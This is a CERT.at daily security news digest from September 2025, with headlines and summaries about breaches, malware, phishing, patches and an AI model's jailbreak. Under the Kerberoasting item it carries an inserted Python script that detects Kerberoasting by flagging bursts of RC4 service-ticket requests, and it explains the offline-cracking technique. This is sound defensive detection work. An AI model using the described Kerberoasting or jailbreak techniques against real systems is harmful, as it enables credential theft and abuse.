https://www.bleepingcomputer.com/news/microsoft/microsoft-reminds-of-window…
∗∗∗ Shiny tools, shallow checks: how the AI hype opens the door to malicious MCP servers ∗∗∗
---------------------------------------------
Kaspersky experts discuss the Model Context Protocol used for AI integration. We describe the MCP's architecture and attack vectors and follow a proof of concept to see how it can be abused.
---------------------------------------------
https://securelist.com/model-context-protocol-for-ai-integration-abused-in-…
∗∗∗ A Cyberattack Victim Notification Framework ∗∗∗
---------------------------------------------
When cyber incidents occur, victims should be notified in a timely manner so they have the opportunity to assess and remediate any harm. However, providing notifications has proven a challenge across industry.
---------------------------------------------
https://www.schneier.com/blog/archives/2025/09/a-cyberattack-victim-notific…
∗∗∗ Lawsuit About WhatsApp Security ∗∗∗
---------------------------------------------
Attaullah Baig, WhatsApp’s former head of security, has filed a whistleblower lawsuit alleging that Facebook deliberately failed to fix a bunch of security flaws, in violation of its 2019 settlement agreement with the Federal Trade Commission.
---------------------------------------------
https://www.schneier.com/blog/archives/2025/09/lawsuit-about-whatsapp-secur…
∗∗∗ FBI Warns of UNC6040 and UNC6395 Targeting Salesforce Platforms in Data Theft Attacks ∗∗∗
---------------------------------------------
The U.S. Federal Bureau of Investigation (FBI) has issued a flash alert to release indicators of compromise (IoCs) associated with two cybercriminal groups tracked as UNC6040 and UNC6395 for a string of data theft and extortion attacks. "Both groups have recently been observed targeting organizations' Salesforce platforms via different initial access mechanisms," the FBI said.
---------------------------------------------
https://thehackernews.com/2025/09/fbi-warns-of-unc6040-and-unc6395.html
∗∗∗ All your vulns are belong to us! CISA wants to maintain gov control of CVE program ∗∗∗
---------------------------------------------
Get ready for a fight over who steers the global standard for vulnerability identification. The Cybersecurity and Infrastructure Security Agency (CISA) nearly let the Common Vulnerabilities and Exposures (CVE) program lapse earlier this year, but a new "vision" document it released this week signals that it now wants more control over the global standard for vulnerability identification.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/09/12/cisas_vision…
∗∗∗ Docker Image Security – Part 2: Minimal and secure Docker images ∗∗∗
---------------------------------------------
Distroless images drastically reduce package sizes by omitting unnecessary components such as Bash and package managers. This improves performance and security.
---------------------------------------------
https://www.heise.de/hintergrund/Docker-Image-Security-Teil-2-Minimale-und-…
∗∗∗ Cybercriminals: "Scattered Lapsus$ Hunters" have had enough ∗∗∗
---------------------------------------------
The gang most recently made headlines with cyberattacks on Jaguar and Marks & Spencer that caused immense damage. Not all of its members are keeping a low profile.
---------------------------------------------
https://www.heise.de/news/Cybergang-Scattered-Lapsus-Hunters-kuendigt-Absch…
∗∗∗ Attackers can cripple the IT security solution IBM QRadar SIEM ∗∗∗
---------------------------------------------
Various components of IBM's IT security solution QRadar SIEM are vulnerable. If attackers successfully exploit the vulnerabilities, they can, among other things, cause DoS conditions that make services crash. If the protection the application is supposed to provide is lost as a result, the consequences can be fatal.
---------------------------------------------
https://www.heise.de/news/Angreifer-koennen-IT-Sicherheitsloesung-IBM-QRada…
∗∗∗ Trusted Connections, Hidden Risks: Token Management in the Third-Party Supply Chain ∗∗∗
---------------------------------------------
Effective OAuth token management is crucial for supply chain security, preventing breaches caused by dormant integrations, insecure storage or lack of rotation.
---------------------------------------------
https://unit42.paloaltonetworks.com/third-party-supply-chain-token-manageme…
∗∗∗ npm hack: attacker largely comes away empty-handed ∗∗∗
---------------------------------------------
In terms of supply chain compromise it was a disaster: the hack of an npm developer account, including the injection of malicious code. But the attacker appears to have walked away fairly empty-handed; depending on the source, he is said to have stolen between 65 and 600 US dollars in cryptocurrency.
---------------------------------------------
https://www.borncity.com/blog/2025/09/14/npm-hack-angreifer-schauen-weitgeh…
∗∗∗ New VoidProxy Phishing Service Bypasses MFA on Microsoft and Google Accounts ∗∗∗
---------------------------------------------
Okta Threat Intelligence exposes VoidProxy, a new PhaaS platform. Learn how this advanced service uses the Adversary-in-the-Middle technique to bypass MFA and how to protect yourself from attacks targeting Microsoft and Google accounts.
---------------------------------------------
https://hackread.com/voidproxy-phishing-service-bypasses-mfa-microsoft-goog…
∗∗∗ Qrator Labs Mitigated Record L7 DDoS Attack from 5.76M-Device Botnet ∗∗∗
---------------------------------------------
Qrator Labs blocked a record L7 DDoS attack from a 5.76M-device botnet targeting government systems, showing rapid global growth since March.
---------------------------------------------
https://hackread.com/qrator-labs-mitigate-l7-ddos-attack-5-76m-botnet/
∗∗∗ 600 GB of Alleged Great Firewall of China Data Published in Largest Leak Yet ∗∗∗
---------------------------------------------
Hackers leaked 600 GB of data linked to the Great Firewall of China, exposing documents, code, and operations. Full details available on the GFW Report.
---------------------------------------------
https://hackread.com/great-firewall-of-china-data-published-largest-leak/
∗∗∗ ShadowSilk Data Exfiltration Attack ∗∗∗
---------------------------------------------
FortiGuard Labs’ network telemetry has observed active exploitation of known vulnerabilities in Drupal Core and the WP-Automatic WordPress plugin for initial access. Following compromise, attackers deploy multiple web shells and utilities to enable lateral movement, privilege escalation, and the installation of remote access trojans (RATs).
---------------------------------------------
https://fortiguard.fortinet.com/outbreak-alert/shadowsilk-data-exfiltration
∗∗∗ Phishing campaign targeting crates.io users ∗∗∗
---------------------------------------------
We received multiple reports of a phishing campaign targeting crates.io users (from the rustfoundation.dev domain name), mentioning a compromise of our infrastructure and asking users to authenticate to limit damage to their crates.
---------------------------------------------
https://blog.rust-lang.org/2025/09/12/crates-io-phishing-campaign/
∗∗∗ The Internet Coup ∗∗∗
---------------------------------------------
A Technical Analysis on How a Chinese Company is Exporting The Great Firewall to Autocratic Regimes.
---------------------------------------------
https://interseclab.org/research/the-internet-coup/
=====================
= Vulnerabilities =
=====================
∗∗∗ Vulnerability in Microsoft Agentic AI and Visual Studio can let malicious code through ∗∗∗
---------------------------------------------
Attackers can exploit a vulnerability in Microsoft Agentic AI and Visual Studio. If an attack succeeds, they can execute malicious code and most likely fully compromise systems. A security update is available for download.
---------------------------------------------
https://www.heise.de/news/Schadcode-Schlupfloch-in-Microsoft-Agentic-AI-und…
∗∗∗ Patch now! Attacks on Samsung Android smartphones observed ∗∗∗
---------------------------------------------
Attackers are currently exploiting a vulnerability in Samsung smartphones running Android 13, 14, 15 and 16. Malicious code can reach devices through it. A security patch is available for selected devices.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Attacken-auf-Android-Smartphones-vo…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (cups, kernel, and mysql-selinux and mysql8.4), Debian (cjson, jetty9, and shibboleth-sp), Fedora (bustle, cef, checkpointctl, chromium, civetweb, cups, forgejo, jupyterlab, kernel, libsixel, linenoise, maturin, niri, perl-Cpanel-JSON-XS, python-uv-build, ruff, rust-busd, rust-crypto-auditing-agent, rust-crypto-auditing-client, rust-crypto-auditing-event-broker, rust-matchers, rust-monitord, rust-monitord-exporter, rust-secret-service, rust-tracing-subscriber, rustup, tcpreplay, tuigreet, udisks2, uv, and xwayland-satellite), Oracle (cups, gdk-pixbuf2, kernel, mysql-selinux and mysql8.4, and php:8.2), Red Hat (kernel, kernel-rt, and multiple packages), Slackware (cups, kernel, and patch), and SUSE (busybox, busybox-links, chromedriver, chromium, cups-filters, curl, go1.25, jasper, java-11-openj9, java-17-openj9, java-1_8_0-openjdk, kernel, kernel-devel, kubo, libssh-config, orthanc-gdcm, python-aiohttp, python-eventlet, python-h2, and xen).
---------------------------------------------
https://lwn.net/Articles/1038231/
∗∗∗ CVE-2025-58434: Critical FlowiseAI Flaw Enables Full Account Takeover ∗∗∗
---------------------------------------------
A severe security vulnerability has been discovered in FlowiseAI, an open-source AI workflow automation tool, exposing users to the risk of complete account compromise. Tracked as CVE-2025-58434, this vulnerability affects both the cloud-hosted version of FlowiseAI and self-hosted deployments that expose the relevant API endpoints.
---------------------------------------------
https://thecyberexpress.com/cve-2025-58434/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 11-09-2025 18:00 − Friday 12-09-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Panama Ministry of Economy discloses breach claimed by INC ransomware ∗∗∗
---------------------------------------------
Panama's Ministry of Economy and Finance (MEF) has disclosed that one of its computers may have been compromised in a cyberattack. The government noted that it activated the security procedures for these situations, stating that the incident has been contained and didn't impact core systems that are vital to its operations.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/panama-ministry-of-economy-d…
∗∗∗ Vidar Infostealer Back with a Vengeance ∗∗∗
---------------------------------------------
The long-running Vidar infostealer has evolved with new obfuscation techniques. That is according to researchers at cybersecurity vendor Aryaka, which published research last week dedicated to a fresh campaign involving the malware-as-a-service Vidar that has emerged in recent weeks. First tracked in late 2018, Vidar is an infostealer that enables affiliates to grab credentials, operating system details, cookies, sensitive financial data, various authentication tokens, and more from compromised environments.
---------------------------------------------
https://www.darkreading.com/endpoint-security/vidar-infostealer-back-with-v…
∗∗∗ Senator Wyden Urges FTC to Probe Microsoft for Ransomware-Linked Cybersecurity Negligence ∗∗∗
---------------------------------------------
U.S. Senator Ron Wyden has called on the Federal Trade Commission (FTC) to probe Microsoft and hold it responsible for what he called "gross cybersecurity negligence" that enabled ransomware attacks on U.S. critical infrastructure, including against healthcare networks.
---------------------------------------------
https://thehackernews.com/2025/09/senator-wyden-urges-ftc-to-probe.html
∗∗∗ New HybridPetya Ransomware Bypasses UEFI Secure Boot With CVE-2024-7344 Exploit ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a new ransomware strain dubbed HybridPetya that resembles the notorious Petya/NotPetya malware, while also incorporating the ability to bypass the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems using a now-patched vulnerability disclosed earlier this year.
---------------------------------------------
https://thehackernews.com/2025/09/new-hybridpetya-ransomware-bypasses.html
∗∗∗ Apple Warns French Users of Fourth Spyware Campaign in 2025, CERT-FR Confirms ∗∗∗
---------------------------------------------
Apple has notified users in France of a spyware campaign targeting their devices, according to the Computer Emergency Response Team of France (CERT-FR). The agency said the alerts were sent out on September 3, 2025, making it the fourth time this year that Apple has notified citizens in the country that at least one of the devices linked to their iCloud accounts may have been compromised as part of highly targeted attacks.
---------------------------------------------
https://thehackernews.com/2025/09/apple-warns-french-users-of-fourth.html
∗∗∗ Huntress's hilarious attacker surveillance splits infosec community ∗∗∗
---------------------------------------------
Security outfit Huntress has been forced onto the defensive after its latest research – described by senior staff as "hilarious" – split opinion across the cybersecurity community.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/09/12/huntress_att…
∗∗∗ Bulletproof Host Stark Industries Evades EU Sanctions ∗∗∗
---------------------------------------------
In May 2025, the European Union levied financial sanctions on the owners of Stark Industries Solutions Ltd., a bulletproof hosting provider that materialized two weeks before Russia invaded Ukraine and quickly became a top source of Kremlin-linked cyberattacks and disinformation campaigns. But new findings show those sanctions have done little to stop Stark from simply rebranding and transferring their assets to other corporate entities controlled by its original hosting providers.
---------------------------------------------
https://krebsonsecurity.com/2025/09/bulletproof-host-stark-industries-evade…
∗∗∗ Swiss government looks to undercut privacy tech, stoking fears of mass surveillance ∗∗∗
---------------------------------------------
The Swiss government could soon require service providers with more than 5,000 users to collect government-issued identification, retain subscriber data for six months and, in many cases, disable encryption.
---------------------------------------------
https://therecord.media/switzerland-digital-privacy-law-proton-privacy-surv…
∗∗∗ Were the router URLs sphairon.box and zyxel.box hijacked? ∗∗∗
---------------------------------------------
I am posting a topic here on the blog that has now been reported to me by two readers and reminds me of an old incident at AVM involving the fritz.box URL. It looks as if the URLs sphairon.box and zyxel.box, which routers (Zyxel, Sphairon) use for access to the router functions, have been hijacked via registered domains. The target pages are to be classified as "malicious".
---------------------------------------------
https://www.borncity.com/blog/2025/09/12/wurden-router-urls-sphairon-box-un…
∗∗∗ EvilAI Operators Use AI-Generated Code and Fake Apps for Far-Reaching Attacks ∗∗∗
---------------------------------------------
Combining AI-generated code and social engineering, EvilAI operators are executing a rapidly expanding campaign, disguising their malware as legitimate applications to bypass security, steal credentials, and persistently compromise organizations worldwide.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/i/evilai.html
∗∗∗ Muck Stealer Malware Used Alongside Phishing in New Attack Waves ∗∗∗
---------------------------------------------
A new report from Cofense reveals that cybercriminals are blending phishing and malware, including Muck Stealer, Info Stealer, ConnectWise RAT, and SimpleHelp RAT in dual-threat attacks, making them harder to defend against.
---------------------------------------------
https://hackread.com/muck-stealer-malware-phishing-new-attack-waves/
∗∗∗ Social engineering & AI: cybercriminals recruiting on the darknet ∗∗∗
---------------------------------------------
Cybercriminals are increasingly looking for social engineering and AI experts on the darknet. An indication of which threats companies should watch out for.
---------------------------------------------
https://heise.de/-10642617
∗∗∗ ChillyHell macOS Backdoor Resurfaces ∗∗∗
---------------------------------------------
In 2025, cybersecurity researchers uncovered a deeply concerning threat targeting macOS systems called ChillyHell—a modular backdoor malware that had managed to fly under the radar for years by cleverly abusing macOS security mechanisms and Apple’s own notarization process.
---------------------------------------------
https://thecyberthrone.in/2025/09/11/chillyhell-macos-backdoor-resurfaces/
=====================
= Vulnerabilities =
=====================
∗∗∗ Samsung patches actively exploited zero-day reported by WhatsApp ∗∗∗
---------------------------------------------
Samsung has patched a remote code execution vulnerability that was exploited in zero-day attacks targeting its Android devices. Tracked as CVE-2025-21043, this critical security flaw affects Samsung devices running Android 13 or later and was reported by the security teams of Meta and WhatsApp on August 13.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/samsung-patches-actively-exp…
∗∗∗ Patch now! Renewed attacks on SonicWall firewalls observed ∗∗∗
---------------------------------------------
The "critical" vulnerability (CVE-2024-40766) has been known since August of last year. The flaw in certain SonicWall firewalls has repeatedly been targeted by attackers. Security updates have been available for about a year, but evidently are still not installed everywhere.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Erneut-Attacken-auf-SonicWall-Firew…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (cups, imagemagick, libcpanel-json-xs-perl, and libjson-xs-perl), Fedora (checkpointctl, chromium, civetweb, glycin, kernel, libssh, ruff, rust-secret-service, snapshot, and uv), Mageia (curl), Red Hat (kernel), SUSE (cups, curl, perl-Cpanel-JSON-XS, regionServiceClientConfigAzure, regionServiceClientConfigEC2, regionServiceClientConfigGCE, trivy, and xen), and Ubuntu (cups, node-cipher-base, and qemu).
---------------------------------------------
https://lwn.net/Articles/1037919/
∗∗∗ CISA Releases Eleven Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-releases-eleven-ind…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 10-09-2025 18:00 − Thursday 11-09-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ New VMScape attack breaks guest-host isolation on AMD, Intel CPUs ∗∗∗
---------------------------------------------
A new Spectre-like attack dubbed VMScape allows a malicious virtual machine (VM) to leak cryptographic keys from an unmodified QEMU hypervisor process running on modern AMD or Intel CPUs.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-vmscape-attack-breaks-gu…
∗∗∗ K2 Think AI Model Jailbroken Mere Hours After Release ∗∗∗
---------------------------------------------
Researchers discovered that measures designed to make AI more transparent to users and regulators can also make it easier for bad actors to abuse.
---------------------------------------------
https://www.darkreading.com/application-security/k2-think-llm-jailbroken
∗∗∗ Opening a folder is enough: popular AI code editor automatically executes malicious code ∗∗∗
---------------------------------------------
Anyone using the AI code editor Cursor should be careful when opening third-party repos. Malware can be executed unnoticed.
---------------------------------------------
https://www.golem.de/news/ordner-oeffnen-reicht-beliebter-ki-code-editor-fu…
∗∗∗ Fake Madgicx Plus and SocialMetrics Extensions Are Hijacking Meta Business Accounts ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed two new campaigns that are serving fake browser extensions using malicious ads and fake websites to steal sensitive data. The malvertising campaign, per Bitdefender, is designed to push fake "Meta Verified" browser extensions named SocialMetrics Pro that claim to unlock the blue check badge for Facebook and Instagram profiles.
---------------------------------------------
https://thehackernews.com/2025/09/fake-madgicx-plus-and-socialmetrics.html
∗∗∗ Akira ransomware crims abusing trifecta of SonicWall security holes for extortion attacks ∗∗∗
---------------------------------------------
Affiliates of the Akira ransomware gang are again exploiting a critical SonicWall vulnerability abused last summer, after a suspected zero-day flaw actually turned out to be related to a year-old bug.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/09/10/akira_ransom…
∗∗∗ Beijing went to EggStreme lengths to attack Philippines military, researchers say ∗∗∗
---------------------------------------------
‘EggStreme’ framework looks like the sort of thing Beijing would find handy in its ongoing territorial beefs. Infosec outfit Bitdefender says it’s spotted a strain of in-memory malware that looks like the work of Chinese advanced persistent threat groups that wanted to achieve persistent access at a “military company” in the Philippines.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/09/11/eggstreme_ma…
∗∗∗ Technical Analysis of kkRAT ∗∗∗
---------------------------------------------
Zscaler ThreatLabz has identified a malware campaign targeting Chinese-speaking users, which has been active since early May 2025. The campaign delivers three types of malware: ValleyRAT, FatalRAT, and a new Remote Access Trojan (RAT) that ThreatLabz named kkRAT.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/technical-analysis-kkrat
∗∗∗ The Great NPM Heist – September 2025 ∗∗∗
---------------------------------------------
On September 8, 2025, the JavaScript ecosystem experienced what is now considered the largest supply chain attack in npm history. A sophisticated phishing campaign led to the compromise of a trusted maintainer’s account, resulting in the injection of cryptocurrency-stealing malware into 18+ foundational npm packages.
---------------------------------------------
https://blog.checkpoint.com/crypto/the-great-npm-heist-september-2025/
∗∗∗ Global Cyber Threats August 2025: Agriculture in the Crosshairs ∗∗∗
---------------------------------------------
In August 2025, the global cyber threat landscape presented a complex interplay of stability and alarming new challenges. Organizations around the world confronted an average of nearly 2,000 cyber attacks each week—a slight 1% decrease from July but a stark 10% rise compared to the same month last year.
---------------------------------------------
https://blog.checkpoint.com/research/global-cyber-threats-august-2025-agric…
∗∗∗ How the Infamous APT 1 Report Exposing China’s PLA Hackers Came to Be ∗∗∗
---------------------------------------------
This is the first in a series of pieces I’ll publish that take an in-depth look at significant events, people and cases in security and surveillance from the past.
---------------------------------------------
https://www.zetter-zeroday.com/how-the-infamous-apt-1-report-exposing-china…
∗∗∗ CyberVolk Ransomware: Analysis of Double Encryption Structure and Disguised Decryption Logic ∗∗∗
---------------------------------------------
The CyberVolk ransomware, which first emerged in May 2024, has been launching attacks on public institutions and key infrastructures of various countries, posing a continuous threat. The ransomware is particularly notable for its pro-Russia nature, as it primarily targets anti-Russian countries, making it a geopolitically significant cyber threat.
---------------------------------------------
https://asec.ahnlab.com/en/90077/
∗∗∗ Trigona Rebranding Suspicions and Global Threats, and BlackNevas Ransomware Analysis ∗∗∗
---------------------------------------------
BlackNevas has been continuously launching ransomware attacks against companies in various industries and countries, including South Korea. This post provides a technical analysis on the characteristics, encryption methods, and reasons why BlackNevas encrypts files in a way that makes them impossible to decrypt.
---------------------------------------------
https://asec.ahnlab.com/en/90080/
∗∗∗ New Fileless Malware Attack Uses AsyncRAT for Credential Theft ∗∗∗
---------------------------------------------
LevelBlue Labs reports AsyncRAT delivered through a fileless attack chain using ScreenConnect, enabling credential theft and persistence.
---------------------------------------------
https://hackread.com/fileless-malware-attack-asyncrat-credential-theft/
∗∗∗ CISA Presents Vision for the Common Vulnerabilities and Exposures (CVE) Program ∗∗∗
---------------------------------------------
Agency Unveils Upcoming Program Enhancements: Strengthening Partnerships, Modernization, Transparency and Elevating Data Quality and Responsiveness.
---------------------------------------------
https://www.cisa.gov/news-events/news/cisa-presents-vision-common-vulnerabi…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco IOS XR ARP Broadcast Storm Denial of Service Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the Address Resolution Protocol (ARP) implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a broadcast storm, leading to a denial of service (DoS) condition on an affected device.
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ DuckDB NPM packages 1.3.3 and 1.29.2 compromised with malware ∗∗∗
---------------------------------------------
The DuckDB distribution for Node.js on npm was compromised with malware (along with several other packages). An attacker published new versions of four of duckdb’s packages that included malicious code to interfere with cryptocoin transactions.
---------------------------------------------
https://github.com/duckdb/duckdb-node/security/advisories/GHSA-w62p-hx95-gf…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (python3.12-cryptography), Debian (chromium, hsqldb1.8.0, and imagemagick), Fedora (bustle, cef, maturin, rust-busd, rust-crypto-auditing-agent, rust-crypto-auditing-client, rust-crypto-auditing-event-broker, rust-monitord, rust-monitord-exporter, rustup, tuigreet, and wireshark), Oracle (kernel, microcode_ctl, and python3.12-cryptography), Red Hat (httpd:2.4 and multiple packages), SUSE (coreutils, curl, dpkg, ffmpeg-4, glib2, gnutls, go1.23-openssl, go1.24-openssl, go1.25-openssl, grub2, ImageMagick, jbigkit, kernel, libxslt, Mesa, opensc, opera, perl-JSON-XS, polkit, postgresql16, protobuf, python311, python311-deepdiff, sqlite3, ucode-intel, and warewulf4), and Ubuntu (bind9 and libxml2).
---------------------------------------------
https://lwn.net/Articles/1037777/
∗∗∗ Unauthenticated SQL Injection Vulnerability in Shibboleth Service Provider (SP) (ODBC Interface) ∗∗∗
---------------------------------------------
SEC Consult has identified an unauthenticated SQL injection vulnerability in the ODBC interface of the Shibboleth Service Provider (SP). An attacker could exploit it to read arbitrary records from the database with the privileges of the database user.
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/unauthentifizierte-sq…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 09-09-2025 18:00 − Mittwoch 10-09-2025 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Phishing in the name of the WKO: sensitive data targeted ∗∗∗
---------------------------------------------
Criminals are currently copying a genuine e-mail from the Austrian Federal Economic Chamber (WKO). Via an attached HTML document they try to lure their victims to a fake portal and harvest sensitive data there. We show you how to recognise the scam attempt.
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-wko/
∗∗∗ You Already Have Our Personal Data, Take Our Phone Calls Too (FreePBX CVE-2025-57819) ∗∗∗
---------------------------------------------
Today, inside this hellscape we call the Internet, a mean person has discovered a zero-day(s) in FreePBX (now lovingly called CVE-2025-57819). But they didn’t stop there - the dastardly individual(s) then proceeded to exploit FreePBX hosts en-masse. [..] Today, we are publishing our Detection Artefact Generator which you can find here.
---------------------------------------------
https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phon…
∗∗∗ US Investment in Spyware Is Skyrocketing ∗∗∗
---------------------------------------------
A new report warns that the number of US investors in powerful commercial spyware rose sharply in 2024 and names new countries linked to the dangerous technology.
---------------------------------------------
https://www.wired.com/story/us-spyware-investment/
∗∗∗ CHILLYHELL macOS Backdoor and ZynorRAT RAT Threaten macOS, Windows, and Linux Systems ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered two new malware families, including a modular Apple macOS backdoor called CHILLYHELL and a Go-based remote access trojan (RAT) named ZynorRAT that can target both Windows and Linux systems.
---------------------------------------------
https://thehackernews.com/2025/09/chillyhell-macos-backdoor-and-zynorrat.ht…
∗∗∗ Pwn My Ride: Exploring the CarPlay Attack Surface ∗∗∗
---------------------------------------------
At the recent DefCon conference, we had the opportunity to present Pwn My Ride, a comprehensive exploration of the Apple CarPlay attack surface. With vehicles becoming increasingly connected, the security of in-car systems like CarPlay is critical.
---------------------------------------------
https://www.oligo.security/blog/pwn-my-ride-exploring-the-carplay-attack-su…
∗∗∗ Kerberoasting ∗∗∗
---------------------------------------------
These “Kerberoasting” attacks have been around for ages: the technique and the name are credited to Tim Medin, who presented it in 2014 (and many popular blogs followed up on it), but the vulnerabilities themselves are much older. [..] I’ll bet most Windows people already know this stuff, but I only happened to learn about it today, after seeing a letter from Senator Wyden to Microsoft, describing how this vulnerability was used in the May 2024 ransomware attack on the Ascension Health hospital system.
---------------------------------------------
https://blog.cryptographyengineering.com/2025/09/10/kerberoasting/
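Kerberoasting leaves a distinctive trace on domain controllers: a burst of service-ticket requests (Security event 4769) from one account, usually asking for RC4-HMAC (encryption type 0x17) so the resulting ticket can be cracked offline. The detection below is an added example, not code from the blog post above or from CERT.at. It assumes the 4769 records have already been parsed into dicts with the fields named in the docstring; the sample events are constructed.

```python
"""Flag Kerberoasting-style bursts in Windows Security event 4769 records.

Added example; not from the blog post or the CERT.at digest. Assumes each
record is a dict with Time (datetime), TargetUserName (requesting account),
ServiceName (account name of the service the ticket was requested for) and
TicketEncryptionType (the hex string Windows logs, "0x17" = RC4-HMAC,
"0x12" = AES256). All sample events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # etype 23: what roasting tools request so the hash is crackable


def find_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return {account: sorted service names} for each account that obtained
    RC4-encrypted service tickets for >= min_services distinct service
    accounts inside any `window`-long interval.

    Skipped: tickets for krbtgt (TGT operations, not SPN tickets) and for
    computer accounts (names ending in '$'), whose long random passwords are
    not crackable and only add noise."""
    by_account = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        by_account[ev["TargetUserName"]].append((ev["Time"], svc))

    hits = {}
    for account, reqs in by_account.items():
        reqs.sort()                       # by time, then service name
        start = 0
        for end in range(len(reqs)):      # sliding window over time-ordered requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) >= min_services:
                hits[account] = sorted(distinct)
                break
    return hits


def _t(s):
    return datetime.fromisoformat(s)


# Constructed sample: jdoe roasts three service accounts within seconds,
# asmith is a normal AES user, legacyapp uses RC4 but only sporadically.
SAMPLE_EVENTS = [
    {"Time": _t("2025-09-10T09:00:01"), "TargetUserName": "jdoe", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"Time": _t("2025-09-10T09:00:02"), "TargetUserName": "jdoe", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"Time": _t("2025-09-10T09:00:02"), "TargetUserName": "jdoe", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17"},
    {"Time": _t("2025-09-10T09:00:03"), "TargetUserName": "jdoe", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"Time": _t("2025-09-10T09:00:04"), "TargetUserName": "jdoe", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"Time": _t("2025-09-10T09:01:00"), "TargetUserName": "asmith", "ServiceName": "svc_web", "TicketEncryptionType": "0x12"},
    {"Time": _t("2025-09-10T09:01:05"), "TargetUserName": "asmith", "ServiceName": "svc_files", "TicketEncryptionType": "0x12"},
    {"Time": _t("2025-09-10T10:00:00"), "TargetUserName": "legacyapp", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"Time": _t("2025-09-10T11:00:00"), "TargetUserName": "legacyapp", "ServiceName": "svc_sql2", "TicketEncryptionType": "0x17"},
]

if __name__ == "__main__":
    for account, services in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

The RC4 filter is a heuristic, not a guarantee: tooling can request AES tickets as well, and environments with legacy services see legitimate RC4 traffic, so tune `window` and `min_services` to the domain and pair the rule with a honey service account whose SPN is never requested by real clients.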
∗∗∗ New Linux Botnet Combines Cryptomining and DDoS Attacks ∗∗∗
---------------------------------------------
Cyble threat intelligence researchers have identified a sophisticated Linux botnet built for cryptocurrency mining, remote command execution, and dozens of DDoS attack types. Cyble Research and Intelligence Labs (CRIL) researchers have dubbed the campaign “Luno.”
---------------------------------------------
https://thecyberexpress.com/linux-botnet-combines-cryptomining-and-ddos/
∗∗∗ Apple Introduces Memory Integrity Enforcement in iPhone 17 to Fight Spyware Exploits ∗∗∗
---------------------------------------------
Apple has introduced Memory Integrity Enforcement (MIE), a system-wide security feature designed to crush one of the most persistent threats to iPhone users: spyware. The company describes MIE as “the most significant upgrade to memory safety in the history of consumer operating systems.”
---------------------------------------------
https://thecyberexpress.com/memory-integrity-enforcement-in-iphone-17/
=====================
= Vulnerabilities =
=====================
∗∗∗ Microsoft September 2025 Patch Tuesday fixes 81 flaws, two zero-days ∗∗∗
---------------------------------------------
Today is Microsoft's September 2025 Patch Tuesday, which includes security updates for 81 flaws, including two publicly disclosed zero-day vulnerabilities. [..] The two publicly disclosed zero-days are: CVE-2025-55234 - Windows SMB Elevation of Privilege Vulnerability [..] CVE-2024-21907 - VulnCheck: CVE-2024-21907 Improper Handling of Exceptional Conditions in Newtonsoft.Json
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2025-pa…
∗∗∗ Adobe patch day: flaws in Acrobat & Co. can let malicious code onto PCs ∗∗∗
---------------------------------------------
List of security patches: Acrobat and Reader, After Effects, ColdFusion, Commerce, Dreamweaver, Experience Manager, Premiere Pro, Substance 3D Modeler, Substance 3D Viewer
---------------------------------------------
https://www.heise.de/news/Patchday-Adobe-Luecken-in-Acrobat-Co-koennen-Scha…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
